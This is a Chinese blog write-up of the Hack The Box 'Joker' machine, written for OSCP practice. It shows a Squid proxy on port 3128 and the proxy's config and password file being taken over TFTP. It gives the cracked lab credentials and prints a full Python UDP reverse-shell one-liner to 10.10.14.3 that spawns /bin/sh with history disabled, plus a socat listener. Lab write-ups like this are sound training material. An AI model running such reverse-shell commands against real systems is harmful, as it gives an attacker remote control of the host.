oscp——htb——Joker

最新推荐文章于 2022-04-21 21:58:00 发布
最新推荐文章于 2022-04-21 21:58:00 发布
阅读量527 收藏
点赞数
分类专栏: oscp
本文为博主原创文章,未经博主允许不得转载,未授权转载为侵权行为,违反法律。
本文链接:https://blog.csdn.net/qq_36869808/article/details/107340618
版权

0x00 前言

这个机子可以了解到Squid相关的知识,如果不是这个机子,我可能都不可能会接触到这个东西。

在这里插入图片描述

0x01 信息收集

在这里插入图片描述

0x02 Web——Webshell

这里有一个3128开放,我找了历史漏洞但是都没有利用成功。

最后才知道可以将3128当做代理。但是我linux本地又有问题,所以只能使用ew进行端口的正向映射出来。

在这里插入图片描述
但是代理挂好之后要求输入密码,那么这里要从另外一个方面入手了。

使用tftp进行连接
然后获取squid相关内容
/etc/squid/squid.conf
/etc/squid/passwords
获取一下相关内容

在这里插入图片描述
cat一下
在这里插入图片描述
john进行爆破获取到密码:kalamari/ihateseafood
在这里插入图片描述
这里输入正确的密码之后就可以看到一个界面
在这里插入图片描述
这里找到一个console页面、

在这里插入图片描述
使用tcp没有办法反弹会shell,最后采用udp反弹shell

import subprocess;subprocess.Popen(["python", "-c", 'import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"10.10.14.3\", 4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn(\"/bin/sh\");s.close()'])

在这里插入图片描述

socat file:`tty`,echo=0,raw udp-listen:1234

在这里插入图片描述
获取一下pty
在这里插入图片描述
我拿到的shell没法执行sudoedit,有点难受。后面的就有点不会了。。。。

王嘟嘟_
关注
专栏目录
OSCP - symfonos writeup
Jiajiajiang_的博客
04-30 513
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/symfonos/symfonos1.7z 发现IP IP为10.0.3.150 nmap SMB 直接使用SMB协议,使用anonymous用户登录 发现一个文件 我猜有人用了这些密码 还发现一个用户 试一下用上面的密码登录下helios smbclient //10.0....
OSCP-Vulnhub靶机记录-digitalworldlocal-fall
最新发布
深入交流学习:webMsec
09-30 264
-hh 隐藏char值为80的结果(错误的参数都这里报80,第一次wfuzz没有加此参数)尝试用读取/home/qiu目录下默认存ssh密钥文件,通过前面扫描端口知道他是开了ssh的。vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。再回leafpad,搜索一下“enum”,看看枚举出什么目录。复制保存到攻击机,key文件最后要有一个回车,否则登录不上去。这里的GET参数是 file,可以尝试文件包含。那么,我们可以试一下,用哪个参数可以拼接进去。ls 一下,提示我们是低权限用户。
HTB-oscplike-Object
m0_53302733的博客
04-21 3199
HTB-oscplike-Object hard难度的object 靶机IP 10.10.11.132 也不知道是这个靶机出的晚刚加上还是很多人oscplike机器打不到这最后一台 这台总共就一百来个人通了 sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.11.132 80/tcp open http Microsoft IIS httpd 10.0 5985/tcp open http Microsoft HTTPAPI httpd
HTB-oscplike-Forest
m0_53302733的博客
04-10 2541
HTB-oscplike-Forest easy难度的forest 靶机IP 10.10.10.161 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.161 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-09 10:45:13Z) 135/tcp
oscp——HTB——Beep
王嘟嘟的博客
05-09 498
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Rootshell 先看一下80端口,是一个登录界面,尝试了弱口令以及SQL注入 搜索一下Elastix的历史漏洞 首先看到了一个LFI的洞,下载下来,然后看一下 利用payload进行测试 这里找到了一个admin的密码 jEhdIekWmdjE 可以尝试登录一下ssh,原本先尝试的admin,但是失败了,又尝试了下root,就可以成功的连接上了。 ...
oscp——HTB——Optimum
王嘟嘟的博客
05-25 538
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Webshell 访问一下目标站点,看到是HFS 搜一下payload 发现可以直接使用msf打过去 拿到shell之后就可以拿到user的flag 这里我用cs又建立了一个稳定的连接 0x03 Webshell——Rootshell 首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描 使用MS16-098进行提权 ...
oscp——HTB—— Lame
王嘟嘟的博客
04-13 609
0x00 前言 vulnhub下载,搞环境搞的人心累,还不如试试HTB~ 难度 入门 1级 (基本没啥难度) 0x01 信息收集 常规扫端口,网太卡了,所以使用先扫常规,然后再进行定点扫描。 0x02 usershell and rootshell 我是做完之后回来写的,这里可以直接拿到两个flag 看到samba,拿msf 看一下版本 use auxiliary/scanner/smb/s...
OSCP认证学习资源汇总.zip
08-19
0x0001-OSCP学习资料PWK v1.15-带书签 0x0002-OSCE学习资料-CPTV 1.0 0x0003-OSCP考试命令大全 0x0004-INE机构OSCP课程 0x0005-bof真题文件 0x0006-缓冲区溢出题目全套解决方案 0x0007-OSCP报告模板参考 0x0008-题型...
OSCP网络安全认证
10-19
**OSCP网络安全认证详解** OSCP(Offensive Security Certified Professional)是网络安全领域内备受推崇的专业认证,由Offensive Security公司颁发。它专为那些希望通过Kali Linux进行渗透测试的网络安全专家设计...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
oscp——htb——Mirai
王嘟嘟的博客
08-06 524
0x00 前言 这道题感觉很多人做了,应该不会很难,所以找找自信,来试试这道题 0x01 信息收集
oscp——htb——Lazy
热门推荐
王嘟嘟的博客
06-29 1万+
0x00 前言 0x01 信息收集 0x02 Web
oscp——HTB——Legacy
王嘟嘟的博客
04-26 543
0x00 前言 乘着网好,赶紧做一做。 难度 入门 1级 (基本没啥难度) 0x01 信息收集 常规上nmap 看了一下目标版本,这里是2003 看到这里看到445以及版本,永恒之蓝没得跑了。 0x02 usershell and rootshell 可以直接开启msf,进行搜索 search smb 获取到shell 首先是找到user.txt 然后找到root.txt ...
废物的靶场日记 htb-oscp-beep+cronos+nineveh
m0_53302733的博客
03-29 1336
HTB-oscplike-beep+cronos+nineveh Beep easy难度的beep 靶机IP10.10.10.7 sudo nmap -sC -sV -A --min-rate=5000 -p- -Pn 10.10.10.7 访问80后发现是一个elastix searchsploit搜到php/webapps/18650.py 修改参数后发现有一个extension需要修改但是不知道是什么勾八 google elastix extension后发现是sip extension 用svwar
HTB-oscplike-Bastian+Secnotes
m0_53302733的博客
04-12 2380
HTB-oscplike-Bastian+Secnotes Bastian easy难度的bastion 靶机IP 10.10.10.134 sudo nmap -sC -sV -p- --min-rate=1000 -Pn 10.10.10.134 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) 135/tcp open msrpc? 139/tcp open netbios-ssn? 445/tcp
oscp——HTB——Popcorn
王嘟嘟的博客
05-09 538
0x00 前言 难度 入门2级 0x01 信息收集 这里开放了22和80 0x02 Web——Webshell 看到这里是一个test,果断扫目录。 拿到目录: http://10.10.10.6/test http://10.10.10.6/torrent/ 先看一下test,phpinfo的界面 访问http://10.10.10.6/torrent/ 可以看到是一个torrent的站,先注册一个账号 然后上传一个torrent 然后这里上传成功 这里上传文件,并使用burp拦截,并且修改
oscp——HTB——Devel
王嘟嘟的博客
05-19 370
0x00 前言 难度 入门1级 0x01 信息收集 这里可以看到开了21和80 扫一下21,由于我这里有一点问题,所以21得重新扫一下 0x02 21——Webshell 本来以为是通过80扫目录然后搞进去。。。但是最后扫了半天发现扫错了。 发现是通过21搞进去的。可以看到是匿名访问。所以直接使用ftp连接。这里可以看到ftp的目录可能是和web目录一致的 访问test.txt进行测试 这里使用msf生成一个aspx的马,然后直接put上传 msf监听,访问cs.aspx会弹回来一个shell
oscp——htb——Haircut
王嘟嘟的博客
07-20 382
0x00 前言 0x01 信息收集 0x02 Web——Webshell 访问 看到这种10个有9个要扫目录,找到了一个exposed.php 这里可以看到执行了一个curl的命令 上一个马。 拿到一个shell 0x03 Webshell——RootShell 获取一下suid,看到一个screen,这个之前vulhub做过一次,有笔记。 提权 www-data@haircut:/tmp$ cd /etc www-data@haircut:/etc$ chmod +x /tmp/root
oscp——htb——Europa
王嘟嘟的博客
07-27 340
0x00 前言 0x01 信息收集 0x02 Web——Webshell
OSCP实战:Raven2靶机渗透及PHPMailer漏洞利用
在OSCP(Offensive Security Certified Professional)认证的学习过程中,一个重要的实践环节就是通过渗透测试来提升实战技能。Raven2靶机是一种被推荐的训练平台,它模拟了一个复杂的网络安全环境,让学生能够在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值